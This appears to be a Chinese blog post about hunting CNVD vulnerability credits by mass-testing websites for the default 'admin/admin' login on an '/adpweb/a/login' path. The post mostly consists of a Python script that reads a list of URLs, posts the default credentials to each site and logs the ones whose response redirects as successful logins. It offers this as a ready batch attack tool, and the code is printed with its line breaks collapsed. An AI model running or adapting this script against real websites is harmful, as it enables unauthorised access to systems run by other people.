---

前言

想刷cnvd？最重要的是登录进行测试功能点

---

一、发现过程

找到一个网站

发现登录失败返回200

登录成功则是重定向 302
那就写一个脚本吧

二、使用步骤

1.引入库

import requests

2.读入数据

import requests# 读取 URL 文件
with open('urls.txt', 'r') as file:urls = file.readlines()# 请求头
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
}# 请求数据
data = {"username": "admin","password": "admin"
}# 对每个 URL 发送 POST 请求
for url in urls:url = url.strip()if not url.startswith("http://") and not url.startswith("https://"):url = f"http://{url}"url = f"{url.rstrip('/')}/adpweb/a/login"try:response = requests.post(url, headers=headers, data=data, allow_redirects=False)print(f"请求 URL: {url}")print("状态代码:", response.status_code)redirect_location = response.headers.get('Location')print("重定向地址:", redirect_location)print("=" * 50)# 如果有重定向，记录相关信息if redirect_location:with open('redirect_log.txt', 'a') as log_file:log_file.write(f"URL: {url}\n")log_file.write(f"Username: {data['username']}\n")log_file.write(f"Password: {data['password']}\n")log_file.write(f"Redirect Location: {redirect_location}\n")log_file.write("=" * 50 + "\n")except requests.exceptions.RequestException as e:print(f"请求 URL {url} 失败: {e}")print("=" * 50)

结果

总结

只要找到特征就可以批量进行登录，poc很简单的，六花祝你天天开心